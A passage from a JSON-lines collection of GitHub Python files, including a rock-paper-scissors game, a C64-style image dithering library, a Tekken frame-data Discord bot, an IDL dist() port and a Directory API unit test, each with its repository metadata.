print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n elif results[0] == \"P\" and results[1] == \"R\":\n print(\"Player 1 WINS this round\\n\")\n player1_wins += 1\n \n #Player2 wins cases\n elif results[0] == \"S\" and results[1] == \"R\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n elif results[0] == \"P\" and results[1] == \"S\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n elif results[0] == \"R\" and results[1] == \"P\":\n print(\"Player 2 WINS this round\\n\")\n player2_wins += 1\n\n sleep(0.8)\n \n if player1_wins > player2_wins:\n print(f'PLAYER 1 WINS BY {player1_wins}|{player2_wins}\\n')\n elif player1_wins < player2_wins:\n print(f'PLAYER 2 WINS BY {player2_wins}|{player1_wins}\\n')\n elif player1_wins == player2_wins:\n print(f'TIE BY 
{player1_wins}|{player2_wins}\\n')\n\ndef play():\n rounds = input(\"How many rounds do you want?\\nNumber of rounds: \")\n check_results(int(rounds))\n\nif __name__ == '__main__':\n play()\n","repo_name":"VarmiloVA/Rock-paper-scissors-Weekly-Challenge","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13034964634","text":"def circularArrayRotation(a, k, queries):\n\n for i in range(k % len(a)):\n temp = a[len(a) - 1]\n for j in range(len(a)-1, 0, -1):\n a[j] = a[j-1]\n a[0] = temp\n\n rotatedArray = []\n for i in queries:\n rotatedArray.append(a[i])\n return rotatedArray\n\n\nprint(circularArrayRotation([1, 2, 3, 4, 5], 12, [0, 1, 2, 3, 4]))\n","repo_name":"sumanth-vs/HackerRank","sub_path":"circArray.py","file_name":"circArray.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10732359740","text":"#!python3\n\nimport ui\nimport ImageEnhance\nimport ImageFilter\nimport ImageOps\nimport numpy\nimport colorsys\nfrom time import time\nimport math\n\nfrom PIL import Image\nfrom io import BytesIO\n\n\n# Convert colors from [0,255] to [0,1]\ndef color_to_1(color):\n\t#return (color[0]/255.0, color[1]/255.0, color[2]/255.0, 1.0)\n\treturn (color[0]/255.0, color[1]/255.0, color[2]/255.0)\n\t\n\ndef color_to_255(color):\n\treturn (int(color[0]*255), int(color[1]*255), int(color[2]*255))\n\n\n# Old function - kept as backup\t\t\t\ndef closest_in_palette(match_color, color_palette):\n\ti = 0\n\tbestDelta = 1000\n\tc = 0\n\tfor color in color_palette:\n\t\tr = sorted((color[0], match_color[0]))\n\t\tg = sorted((color[1], match_color[1]))\n\t\tb = sorted((color[2], match_color[2]))\n\t\tdelta = r[1]-r[0] + g[1]-g[0] + b[1]-b[0]\n\t\tif delta < bestDelta:\n\t\t\ti = c\n\t\t\tbestDelta = delta\n\t\tc = c + 1\n\treturn color_palette[i]\n\n\ndef closest_color(match_color, conversion_palette):\n\tcolor_distances = list()\n\tfor c in conversion_palette:\n\t\tcolor_distances.append((colordistance(match_color, c[0]), c[0]))\n\tcolor_distances.sort(key=lambda tup: tup[0])\t\n\treturn color_distances[0][1]\n\n\n# sRGB to linear\n# Input and output is in the range of 0..255\ndef to_linear(value, gamma_value):\n\tif value <= 0:\n\t\treturn 0\n\tif value >= 255:\n\t\treturn 255\n\tvalue = float(value)/255\n\tif value <= 0.04045:\n\t\treturn (value/12.92)*255\n\treturn (((value+0.055)/1.055)**gamma_value)*255\n\t\n\t# 0 <= S <= 0.04045: L = S/12.92\n\t# 0.04045 < S <+ 1: L = ((S+0.055)/1.055)**2.4\n\n\t\t\ndef srgb_to_linear(color, gamma_value):\n\tcolor = to_linear(color[0], gamma_value), to_linear(color[1], gamma_value), to_linear(color[2], gamma_value)\n\t#(rm, gm, bm) = lumabalance\n\t#color = color[0]*rm, color[1]*gm, color[2]*bm\n\treturn color\n\n\n# Linear to sRGB\n# Input and output is in the range of 0..255\ndef from_linear(value, gamma_value):\n\tif value <= 0:\n\t\treturn 0\n\tif value >= 255:\n\t\treturn 255\n\tvalue = float(value)/255\n\tif value <= 0.0031308:\n\t\treturn (value*12.92)*255\n\treturn ((1.055*value)**(1/gamma_value) - 0.055)*255\n\t\n\t# 0 <= L <= 0.0031308: S = L*12.92\n\t# 0.0031308 < L <= 1: S = (1.055*L)**(1/2.4) - 0.055\n\n\t\t\ndef linear_to_srgb(color, gamma_value):\n\t#(rm, gm, bm) = lumabalance\n\t#color = float(color[0])/rm, float(color[1])/gm, float(color[2])/bm\n\tcolor = from_linear(color[0], gamma_value), from_linear(color[1], 
gamma_value), from_linear(color[2], gamma_value)\n\treturn color\n\n\ndef lumabalance_mult(color):\n\t#lumabalance = [0.299, 0.587, 0.114]\n\t#lumabalance = [1-0.299, 1-0.587, 1-0.114]\n\t#lumabalance = [0.9, 0.7, 1.0] # First testvalues\n\t#lumabalance = [0.9, 1.0, 0.7]\n\t#lumabalance = [1.0, 1.0, 1.0] # Debug\n\t#(rm, gm, bm) = lumabalance\n\t(rm, gm, bm) = [0.9, 1.0, 0.7]\n\tcolor = color[0]*rm, color[1]*gm, color[2]*bm\n\treturn color\n\ndef colordistance(col1, col2):\n\t(r1,g1,b1) = col1[0], col1[1], col1[2]\n\t(r2,g2,b2) = col2[0], col2[1], col2[2]\n\treturn math.sqrt((r1 - r2)**2 + (g1 - g2)**2 + (b1 - b2)**2)\n\n\t\n\t\t\t\n# Check if number is even or odd, used by dithered paint mode\ndef is_odd(x):\n\treturn (x % 2)\n\t\n\t\ndef xy_to_index(xcoord, ycoord, actual_width, maximum=31999):\n\tarrayIndex = int((ycoord*actual_width) + xcoord)\n\tif arrayIndex > maximum:\n\t\tprint ('Illegal index:' + str(arrayIndex) + ', coord:[' + str(xcoord) + ',' + str(ycoord) + ']')\n\t\treturn False\n\treturn arrayIndex\n\t\n\n# Is this even used?\t\ndef index_to_xy(arrayIndex, actual_width):\n\tycoord = int(arrayIndex/actual_width)\n\txcoord = arrayIndex - (actual_width * ycoord)\n\treturn (xcoord, ycoord)\n\t\n\t\n# Convert from PIL Image to ui.image\n# Translates image data from the Python Image Lib to the iOS ui\ndef pil_to_ui(img):\n\twith BytesIO() as bIO:\n\t\timg.save(bIO, 'png')\n\t\treturn ui.Image.from_data(bIO.getvalue()) # 'PY_SSIZE_T_CLEAN macro must be defined for '#' formats'\n\t\t\n\t\t# Above version failed to work for a few versions. Here's the workaround just in case:\n\t\t#img.save('temp/preview.png')\n\t\t#return ui.Image.named('temp/preview.png')\n\t\t\n\t\t\n# Convert from ui.image to PIL Image\ndef ui_to_pil(img):\n\treturn Image.open(BytesIO(img.to_png()))\n\t\n\t\ndef pixels_to_png(bg_color, pixels, width, height):\n\t# Create image\n\tbgColor = color_to_255(bg_color)\n\tim = Image.new(\"RGB\", (int(width), int(height)), bgColor)\n\t# Fill with pixels\n\tfor p in pixels:\n\t\tpixelCol = bgColor\n\t\t# convert pixel data from RGBA 0..1 to RGB 0..255\n\t\tpixelCol = color_to_255(p.color)\n\t\tim.putpixel((int(p.position[0]*2), p.position[1]), pixelCol)\n\t\tim.putpixel((int(p.position[0]*2)+1, p.position[1]), pixelCol)\n\treturn im\n\t\n\t\ndef pixels_to_file(bg_color, pixels, width, height, filename):\n\tim = pixels_to_png(bg_color, pixels, width, height)\n\tim.save(filename)\n\treturn True\n\n\t\t\ndef file_to_img(filename, actual_width, height, antialias=False):\n\t# Do a check for file type\n\tim = Image.open(filename).convert('RGBA') # Open as PIL image\n\tscalefilter = Image.NEAREST\n\t\n\tprint('Loading image ' + str(filename) + ' with size:' + str(im.size))\n\t\n\t# If the image is 320 by 200 pixels, we resize it to 160 by 200\n\tif im.size == (actual_width*2, height):\n\t\t#print('Scale mode 1 on ' + str(filename))\n\t\tim = im.resize((int(actual_width), int(height)), scalefilter)\n\t\n\t# Image size differs, we crop the image and do an aspect ratio conversion\n\telse:\n\t\t#print('Scale mode 2 on ' + str(filename))\n\t\tim = ImageOps.fit(im, (300,200))\n\t\tim = im.resize((actual_width, height), scalefilter)\n\t\n\treturn im\n\t\n\t\n# Takes character index as an input at returns all indices for the character that index contains\ndef get_char(index):\n\t# charNum = ((index/1280)*40) + (int(index/4)%40)\n\tcharNum = 
numpy.array([0,1,2,3,160,161,162,163,320,321,322,323,480,481,482,483,\n\t640,641,642,643,800,801,802,803,960,961,962,963,1120,1121,1122,1123])\n\tfirstCharIndex = (int(index/1280)*1280) + ((int(index/4)%40)*4)\n\tcharArray = charNum + firstCharIndex\n\treturn charArray\n\n\t\t\ndef pngstrip(basestring):\n\tif basestring[-4:] == '.png':\n\t\treturn basestring[:-4]\n\telse:\n\t\treturn basestring\n\n\ndef build_button(self, button_name, button_width, button_pos, button_action, buttcol, backcol, textcol):\n\t\tmybutt = ui.Button(name=button_name, title=button_name)\n\t\tmybutt.height = 32-2\n\t\tmybutt.width = button_width-2\n\t\tmybutt.center = (button_pos[0]+(button_width*0.5), button_pos[1]+16)\n\t\t#mybutt.background_color = 'black'\n\t\tmybutt.background_color = buttcol\n\t\tmybutt.tint_color = textcol\n\t\tmybutt.corner_radius = 6\n\t\tmybutt.action = button_action\n\t\tself.add_subview(mybutt)\n\t\treturn mybutt\n\t\n\n\t\n#def convert_c64(img, conversion_palette, gamma_value, palette_gamma, c64color_names, dither_method, dither_pattern_data, dither_pattern, Settings, startline=0, endline=20): #dither_distance_range, startline=0, endline=20):\n#\tdither_distance_range = Settings.dither_distance_range\n\ndef convert_c64(img, conversion_palette, gamma_value, palette_gamma, c64color_names, dither_method, dither_pattern_data, dither_pattern, dither_distance_range, dither_range, startline=0, endline=20):\t\n\tfor ycoord in range(startline, endline):\n\t\tfor xcoord in range(0, img.width):\n\t\t\t#if ycoord%10 > 4:\n\t\t\t#\timg.putpixel((xcoord,ycoord),img.getpixel((xcoord,ycoord)))\n\t\t\t#else:\n\t\t\tpixelcol = srgb_to_linear(img.getpixel((xcoord,ycoord)), gamma_value)\n\t\t\tif dither_method == 2:\n\t\t\t\t# Additive dither\n\t\t\t\tpixelcol = dither_additive(pixelcol, (xcoord,ycoord), conversion_palette, dither_pattern_data, dither_pattern, dither_distance_range)\n\t\t\telif dither_method == 3:\n\t\t\t\t# Triangle dither\n\t\t\t\tpixelcol = dither_blends(pixelcol, conversion_palette, palette_gamma, c64color_names, (xcoord,ycoord), dither_range, dither_pattern_data, dither_pattern)\n\t\t\telse:\n\t\t\t\t# Nearest color\n\t\t\t\tpixelcol = closest_color(pixelcol, conversion_palette)\n\t\t\t\n\t\t\tpixelcol = max(0, pixelcol[0]), max(0, pixelcol[1]), max(0, pixelcol[2])\n\t\t\tpixelcol = linear_to_srgb(pixelcol, gamma_value)\n\t\t\timg.putpixel((xcoord,ycoord),((int(pixelcol[0])),int(pixelcol[1]),int(pixelcol[2])))\n\treturn img\n\n\ndef resize_into_img(img, width, height, scalefilter=Image.NEAREST):\n\tif float(img.width)/float(img.height) < float(width)/float(height):\n\t\tprint ('Image is taller than wide')\n\t\tresize_width = img.width * height / img.height\n\t\tresize_height = height\n\telse:\n\t\tresize_width = width\n\t\tresize_height = img.height * width / img.width\n\timage_resize = img.resize((resize_width, resize_height), scalefilter)\n\tprint('Image scaled to:' + str(image_resize.size))\n\tbackground = Image.new('RGBA', (width, height), (0, 0, 0, 255))\n\toffset = ((width - resize_width) / 2, (height - resize_height) / 2)\n\t#offset = (50,50)\n\tbackground.paste(image_resize, offset)\n\treturn background.convert('RGB')\n\n\ndef scale_img(img, antialias_method, width, height, aspect_method, crop_method):\n\t\n\tscalefilter = Image.NEAREST\n\tif antialias_method == 2:\n\t\tscalefilter = Image.ANTIALIAS\n\t\n\t#img = img.filter(ImageFilter.SMOOTH_MORE)\n\t\t\t\t\n\t# Image size differs, we crop the image and do an aspect ratio conversion\n\tif img.size != (width*2, 
height):\n\t\tif aspect_method == 1:\n\t\t\timgwidth = 300\n\t\telse:\n\t\t\timgwidth = 320\n\t\tif crop_method == 1:\n\t\t\timg = ImageOps.fit(img, (imgwidth,200))\n\t\telse:\n\t\t\timg = resize_into_img(img, imgwidth, 200, scalefilter)\n\t# Finally, resize to C64 non-square pixels\n\timg = img.resize((width, height), scalefilter)\n\t\n\treturn img\n\n\ndef filter_img(img, contrast=1.0, brightness=1.0, saturation=1.0):\n\tenhancer = ImageEnhance.Brightness(img)\n\timg = enhancer.enhance(brightness)\n\t\n\tenhancer = ImageEnhance.Contrast(img)\n\timg = enhancer.enhance(contrast)\n\t\n\tenhancer = ImageEnhance.Color(img) # Saturation\n\timg = enhancer.enhance(saturation)\n\t\n\t# Blur the color channel to reduce color noise\n\t#colorsys.rgb_to_hls(r, g, b)\n\t#img = img.convert('HSV')\n\t#(old_h, old_s, old_v) = img.split()\n\t\n\t#img = img.filter(ImageFilter.BLUR)\n\t#(blur_h, blur_s, blur_v) = img.split()\n\t#img = Image.merge('HSV', (blur_h, old_s, old_v))\n\t\n\t#img = img.convert('RGB')\n\t\n\t#img = img.filter(ImageFilter.MedianFilter(3))\n\t#img = img.filter(ImageFilter.SMOOTH_MORE)\n\t\n\treturn img\n\n\n\n# Not used at the moment\ndef dither_twocolors(match_color, conversion_palette, c64_color_names, palette_gamma, dither_distance_range, dither_pattern_data, dither_pattern, index, pos):\n\t# Todo: Revise this, something isnt quite working\n\tdistance = conversionpalette[index][2]\n\tcolor1index = c64color_names.index(conversionpalette[index][3])\n\tcolor2index = c64color_names.index(conversionpalette[index][4])\n\tcolor1 = palette_gamma[color1index]\n\tcolor2 = palette_gamma[color2index]\n\t\n\tdist1 = colordistance(match_color, color1)\n\tdist2 = colordistance(match_color, color2)\n\t\n\tsafezone = dither_distance_range\n\t\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\t\n\tditherx = pos[0]%len(dithertable[0])\n\tdithery = pos[1]%len(dithertable)\n\tditherlookup = dithertable[dithery][ditherx]\n\tdist = 0.5\n\t\n\t#if ditherx == 0 and dithery == 0:\n\t#\treturn (128,0,0)\n\t\n\t#temprgb1 = int(dist1)\n\t#temprgb2 = int(dist2)\n\t#return (temprgb1, 0, temprgb2)\n\t\n\tif dist1 < dist2:\n\t\tdist = (dist1-safezone) / (distance-safezone*2)\n\telse:\n\t\tdist = 1.0 - ( (dist2-safezone) / (distance-safezone*2) )\n\t\n\tif ditherlookup > dist:\n\t\treturn color1\n\telse:\n\t\treturn color2\n\n\n# Triangle dithering: \n# Scalar projects the pixel down to the vector of the two colors to be dithered.\n# Calculates the dither based on where the projection lands on the line.\ndef dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, index, position, dither_range, dither_pattern_data, dither_pattern):\n\tif match_color[0] <= palette_gamma[0][0] and match_color[1] <= palette_gamma[0][1] and match_color[2] <= palette_gamma[0][2]:\n\t\treturn palette_gamma[0]\n\tif match_color[0] >= palette_gamma[1][0] and match_color[1] >= palette_gamma[1][1] and match_color[2] >= palette_gamma[1][2]:\n\t\treturn palette_gamma[1]\n\t\n\t# Todo: This might need a gamma and luma correction\n\tcolor1index = c64color_names.index(conversion_palette[index][3])\n\tcolor2index = c64color_names.index(conversion_palette[index][4])\n\tcol1 = palette_gamma[color1index]\t# Darker color\n\tcol2 = palette_gamma[color2index]\t# Brighter color\n\t\n\t# Unit vector of col1->col2\n\tcolvec = (col2[0]-col1[0], col2[1]-col1[1], col2[2]-col1[2])\n\t#coldist = math.sqrt((colvec[0]*colvec[0])+(colvec[0]*colvec[0])+(colvec[0]*colvec[0]))\n\tcoldist = conversion_palette[index][2]\n\t\n\t# Calculate 
scalar projection of matchcol->col1 onto col1->col2\n\tmatchvec = (match_color[0]-col1[0], match_color[1]-col1[1], match_color[2]-col1[2])\n\tprojlength = float((matchvec[0]*colvec[0])+(matchvec[1]*colvec[1])+(matchvec[2]*colvec[2])) / coldist\n\t\n\t# Divide the length by the precalc length. This will be our gradient ratio!\n\tgradratio = projlength / coldist\n\t\n\tif dither_range == 0:\n\t\treturn col2\n\t\t#if gradratio < 0.5:\n\t\t#\treturn col1\n\t\t#else:\n\t\t#\treturn col2\n\t\n\tif dither_range != 1:\n\t\t# Offset 0 by the dither range, make sure it doesnt get negative\n\t\t# gradratio and dither_range runs between 0 and 1\n\t\t\n\t\t#gradratio = gradratio -(dither_range* 0.5) \n\t\t#gradratio = ((gradratio+0.5) / dither_range)\n\t\t\n\t\tgradratio = (gradratio / dither_range) #- (gradratio * 0.5)\n\t\t#gradratio = (gradratio-0.5)*2\n\t\t\n\t\t#gradratio = (gradratio / dither_range)\n\t\t#gradratio = (-0.5 * (1.0 - dither_range)) + (gradratio / dither_range)\n\t\t\n\t\t#return (int(projlength), 0, 0)\n\t\t#return (int(gradratio*255), 0, 0)\n\t\n\t# Debug colours\t\n\t#if position[1]%66 > 33:\n\t#\treturn(int(255*gradratio), 0, 0)\n\t\t\t\t\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\tditherx = position[0]%len(dithertable[0])\n\tdithery = position[1]%len(dithertable)\n\tditherlookup = dithertable[dithery][ditherx]\n\t\n\tif ditherlookup > gradratio:\n\t\treturn col1\n\telse:\n\t\treturn col2\n\n\t\t\ndef dither_blends(match_color, conversion_palette, palette_gamma, c64color_names, position, dither_range, dither_pattern_data, dither_pattern):\n\ti = 0\n\tbest_distance = 1000\n\t\n\tfor c in range(0, len(conversion_palette)):\n\t\tif conversion_palette[c][1] == 'mix':\n\t\t\tpalette_color = conversion_palette[c][0]\n\t\t\tdistance = colordistance(palette_color, match_color)\n\t\t\tif distance < best_distance:\n\t\t\t\ti = c\n\t\t\t\tbest_distance = distance\n\t\t\tc = c + 1\n\t\t\n\t#### Temp color test!\n\t#return conversion_palette[i][0]\n\t####\t\t\t\n\t\n\t#### Temp color test!\n\treturn dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, i, position, dither_range, dither_pattern_data, dither_pattern)\n\t\t\t\t\t\t\t\t\t\t\n\tif conversion_palette[i][1] == 'base':\n\t\treturn conversion_palette[i][0]\n\n\telif conversion_palette[i][1] == 'replace':\n\t\tcolorname = conversion_palette[i][2]\n\t\treturn palette_gamma[c64color_names.index(colorname)] \n\n\telif conversion_palette[i][1] == 'mix':\n\t\treturn dither_triangle(match_color, conversion_palette, c64color_names, palette_gamma, i, position, dither_range, dither_pattern_data, dither_pattern)\n\t\t\n\telse: \n\t\treturn (0,0,255)\n\n\t\t\t\ndef dither_additive(match_color, position, conversion_palette, dither_pattern_data, dither_pattern, dither_distance_range):\n\t# Add dither matrix to match_color\n\tdithertable = dither_pattern_data[dither_pattern[0]]\n\tditherx = position[0]%len(dithertable[0])\n\tdithery = position[1]%len(dithertable)\n\t#ditherlookup = dithertable[dithery][ditherx] * -40\n\t#ditherlookup = ( dithertable[dithery][ditherx] * dither_distance_range )\n\tditherlookup = (dithertable[dithery][ditherx] * dither_distance_range * 1.7) - (dither_distance_range*1.0)\n\tmatch_color = match_color[0] + ditherlookup, match_color[1] + ditherlookup, match_color[2] + ditherlookup\n\t\n\t# Debug\n\t#return match_color\n\t\t\t\t\n\t# Calculate the distance to all colors in the palette, then sort by distance\n\tclosest_match = closest_color(match_color, conversion_palette)\n\t\n\t# 
Return the closest color\n\treturn closest_match\n\t\n\n","repo_name":"superrune/Redux-Paint","sub_path":"include/redux_functions.py","file_name":"redux_functions.py","file_ext":"py","file_size_in_byte":15543,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"81"} +{"seq_id":"2983776991","text":"import discord\nimport asyncio\nimport logging\nfrom discord.ext import commands\n\n# self-created modules below\nimport lib.embedCreation as embedCreation #contains functions for creating an embed\nimport lib.tekkenFinder as tekkenFinder #contains functions for finding character and move details\n\n# Get token from local dir text file\ntokenFile = open(\"token.txt\", 'r')\ntoken = tokenFile.read()\ntokenFile.close()\n\ndescription = 'A Tekken 7 Frame Data Bot made by Hann.'\n\nprefix = '.'\n\ndiscord_logger = logging.getLogger('discord')\ndiscord_logger.setLevel(logging.CRITICAL)\nlog = logging.getLogger()\nlog.setLevel(logging.INFO)\nhandler = logging.FileHandler(filename='combot.log', encoding='utf-8', mode='w')\nlog.addHandler(handler)\n\nbot = commands.Bot(command_prefix=prefix, description=description)\n\ncombot_gagged_channels_File = open(\"lib/gagged_channels.txt\", 'r')\ncombot_gagged_channels = combot_gagged_channels_File.read().splitlines()\ncombot_gagged_channels_File.close()\n\n# TODO: YOU LEFT OFF HERE\n# TODO: MAYBE NEXT TIME FAM\n# file = open('bot_settings.json', 'r+')\n# content = file.read()\n# file.close()\n# stuff = content.loads(content)\n\n@bot.event\nasync def on_ready():\n # Display Login Status in Console\n print('<---------------------------->')\n print('Logged in as')\n print(bot.user.name)\n print(bot.user.id)\n print('<---------------------------->')\n while True:\n await bot.change_presence(game=discord.Game(name='DAH'))\n await asyncio.sleep(30)\n await bot.change_presence(game=discord.Game(name='.help'))\n await asyncio.sleep(120)\n await bot.change_presence(game=discord.Game(name='Riri Toppu Tieru'))\n await asyncio.sleep(30)\n await bot.change_presence(game=discord.Game(name='TEKKEN 7'))\n await asyncio.sleep(30)\n\n@bot.event\nasync def on_message(message):\n # check if message author is a bot\n if message.author.bot:\n # check if sent by self\n if message.author.id == bot.user.id:\n await bot_message_cleanup(message)\n return\n if await is_Gagged(message):\n return\n\n if message.content.startswith('!'):\n if message.content.startswith('!!'):\n case_sensitive_toggle = True\n else:\n case_sensitive_toggle = False\n\n # message content should look like this\n # ![character] [move]\n\n userMessage = message.content\n userMessage = userMessage.replace(\"!\", \"\")\n user_message_list = userMessage.split(\" \", 1)\n\n if len(user_message_list) <= 1:\n print('! 
command used, but character not found/move not given\\n')\n return\n\n user_Chara_Name = user_message_list[0]\n user_Chara_Move = user_message_list[1]\n\n #TODO: IMPLEMENT CHARACTER SHORTHAND NAME CONVERTER, OR CHARACTER NAMELIST DISPLAY\n character_name_string = tekkenFinder.does_char_exist(user_Chara_Name)\n\n if character_name_string:\n user_Chara_Name = character_name_string.lower()\n move_attribute_dict = tekkenFinder.get_Move_Details(user_Chara_Name,\n user_Chara_Move,\n case_sensitive_toggle)\n\n if move_attribute_dict: # if dictionary not empty, move found\n embed_MoveFound = await get_MoveFound_Embed(**move_attribute_dict)\n await bot.send_message(message.channel, embed=embed_MoveFound)\n\n else: # dictionary is empty, move not found\n embed_SimilarMoves = await get_SimilarMoves_Embed(user_Chara_Name,user_Chara_Move)\n await bot.send_message(message.channel, embed=embed_SimilarMoves)\n\n await user_message_cleanup(message)\n return\n\n else:\n await bot.send_message(message.channel, 'Character not found: ' + '**' + user_Chara_Name + '**')\n return\n\n await bot.process_commands(message)\n\n\n@bot.command(pass_context=True)\nasync def legend(ctx):\n \"\"\"Displays commonly used abbreviations, notations and their corresponding input icons.\"\"\"\n embed_legend = embedCreation.embed_legend()\n await bot.say(embed=embed_legend)\n await user_message_cleanup(ctx.message)\n\n\n@bot.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def gagcombot(ctx):\n \"\"\"Gags Combot in this channel. Usable only by admin roles.\"\"\"\n channel = ctx.message.channel.id\n combot_gagged_channels.append(channel)\n\n f = open(\"lib/gagged_channels.txt\",\"a\")\n f.write(channel + '\\n')\n f.close()\n\n await bot.say('Mmmph! Gagging Combot.')\n\n\n@bot.command(pass_context=True)\n@commands.has_permissions(administrator=True)\nasync def ungagcombot(ctx):\n \"\"\"Ungags Combot in this channel. Usable only by server admins.\"\"\"\n channel = ctx.message.channel.id\n if channel in combot_gagged_channels:\n combot_gagged_channels.remove(channel)\n else:\n return\n # clear file contents and rewrite\n open(\"lib/gagged_channels.txt\", \"w\").close()\n f = open(\"lib/gagged_channels.txt\", \"a\")\n for channel in combot_gagged_channels:\n f.write(channel+'\\n')\n f.close()\n\n await bot.say('Ungagged Combot. Beep Boop.')\n\n\n@bot.command(pass_context=True)\nasync def printServers(ctx):\n \"\"\"List servers with Combot. Cmd restricted to Bot Owner.\"\"\"\n appinfo = await bot.application_info()\n owner = appinfo.owner.id\n\n if ctx.message.author.id != owner:\n print('Non-bot owner called print server.')\n await bot.say('Command restricted to bot owner only.')\n await user_message_cleanup(ctx.message)\n return\n else:\n print('Bot Owner called print server.')\n\n serverConctStr = ''\n for server in bot.servers:\n serverConctStr = serverConctStr + server.name + '\\n'\n await bot.say('Server List: \\n' + serverConctStr)\n await user_message_cleanup(ctx.message)\n\n\n@bot.command(pass_context=True)\nasync def Frame_Data(ctx):\n \"\"\"Use ![character] [move], !! for case-sensitive search\"\"\"\n await user_message_cleanup(ctx.message)\n return\n\n\n@bot.command(pass_context=True)\nasync def invite(ctx):\n \"\"\"Invite the bot to your server.\"\"\"\n await bot.say('Use this link to add me to your server. 
\\nhttps://discordapp.com/oauth2/authorize?client_id=302295833208946689&scope=bot&permissions=11264')\n await user_message_cleanup(ctx.message)\n return\n\n\n# This block of code to be used when character html pages are updated, do not edit\n@bot.command(pass_context=True)\nasync def convertAll(ctx):\n \"\"\"Converts all \"\"\"\n appinfo = await bot.application_info()\n owner = appinfo.owner.id\n\n if ctx.message.author.id != owner:\n return\n else:\n await bot.say('Converting all character htmls to json.')\n tekkenFinder.charJsonMassConverter()\n return\n\n\n@bot.event\nasync def on_command_error(error, ctx):\n if isinstance(error, commands.CheckFailure):\n await bot.send_message(ctx.message.channel, \"You don't have permissions to run this.\")\n\n# ==============================================\n# ==========NON COMMAND FUNCTIONS===============\n# ==============================================\nasync def bot_message_cleanup(message):\n TZ_Server_ID = '165310633884123137'\n TZ_FrameChannel_ID = '315052762947649536'\n TestServer_Server_ID = '302481884984639488'\n TestServer_ChannelID = '303175029884059649'\n Delay_Seconds = 10\n\n if message.channel.is_private or message.channel.id == TZ_FrameChannel_ID:\n # lazy workaround for TZ's frame data channel cuz ppl spam shit in chara channels\n # dont do shit\n return\n if message.server.id == TZ_Server_ID:\n # lazy workaround No.2\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n return\n\n if message.channel.permissions_for(message.server.me).manage_messages:\n # self delete does not require server permissions,\n # but tying both cleanups to one check for now until I make a controllable toggle.\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n return\n\nasync def user_message_cleanup(message):\n Delay_Seconds = 15\n if message.channel.is_private:\n return\n if message.channel.permissions_for(message.server.me).manage_messages:\n await asyncio.sleep(Delay_Seconds)\n await bot.delete_message(message)\n\nasync def is_Gagged(user_message):\n message = user_message\n # check if channel is gagged\n if message.content != '.ungagcombot':\n for channelID in combot_gagged_channels:\n if message.channel.id == channelID:\n return True\n\n return False\n\nasync def get_MoveFound_Embed(**move_attribute_dict):\n misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(move_attribute_dict['char_name'])\n embedDict = {**move_attribute_dict, **misc_details_Dict}\n embed_MoveFound = embedCreation.embed_Move_Details(**embedDict)\n\n return embed_MoveFound\n\nasync def get_SimilarMoves_Embed(user_Chara_Name, user_Chara_Move):\n misc_details_Dict = tekkenFinder.get_Misc_Chara_Details(user_Chara_Name)\n similar_moves_list = tekkenFinder.get_Similar_Moves(user_Chara_Name, user_Chara_Move)\n embed_SimilarMoves = embedCreation.embed_Similar_Moves(similar_moves_list, user_Chara_Name, **misc_details_Dict)\n\n return embed_SimilarMoves\n\n#Starts the bot\nbot.run(token)\n\nhandlers = log.handlers[:]\nfor hdlr in handlers:\n hdlr.close()\n log.removeHandler(hdlr)\n","repo_name":"hanyaah/TkPublic","sub_path":"TekkenBot.py","file_name":"TekkenBot.py","file_ext":"py","file_size_in_byte":9519,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"81"} +{"seq_id":"69880968584","text":"\ndef dist_idl(n1,m1=None):\n ''' Copy of IDL's dist.pro\n Create a rectangular array in which each element is \n proportinal to its frequency'''\n\n import numpy as np\n\n #n1 = n[0]\n if m1 == None:\n m1 = 
n1\n #print m1\n #print n1\n\n x = np.arange(float(n1))\n for i in range(len(x)): x[i]= min(x[i],(n1 - x[i])) ** 2.\n\n a = np.zeros([float(n1),float(m1)])\n\n i2 = m1/2 + 1\n\n #print i2\n for i in np.arange(i2):\n y = np.sqrt(x + i ** 2.)\n a[:,i] = y\n if i != 0:\n a[:,m1-i]=y \n\n return a\n\n\n","repo_name":"deutschmarco/VieroLibrary","sub_path":"dist_idl.py","file_name":"dist_idl.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"24050700375","text":"import unittest\n\nfrom directory_api_users_test_base import DirectoryApiUsersTestBase\nfrom test_utils import GetExpectedPrintOutput\n\n\nclass DirectoryApiUsersCustomerIdTest(DirectoryApiUsersTestBase):\n \"\"\"Tests api's used by ls_customer_id.py.\"\"\"\n\n def testCanGetCustomerIdWithValidDomain(self):\n self.assertEqual(\n self.primary_customer_id,\n self._api_wrapper.GetCustomerId(self.primary_domain))\n\n def testCustomerIdWithUnknownDomainIsNone(self):\n self.assertIsNone(self._api_wrapper.GetCustomerId(self.unknown_domain))\n\n\nclass DirectoryApiPrintUsersCustomerIdStdoutTest(DirectoryApiUsersTestBase):\n \"\"\"Tests api's used by ls_customer_id.py.\"\"\"\n\n def testPrintCustomerIdWithValidDomainHasExpectedOutput(self):\n self._api_wrapper.PrintCustomerId(self.primary_domain)\n self.assertEqual(GetExpectedPrintOutput('PrintCustomerId.1'),\n self._new_stdout.print_messages)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"google/gfw-toolkit","sub_path":"toolkit/tests/directory_api_users_customerid_test.py","file_name":"directory_api_users_customerid_test.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"81"} 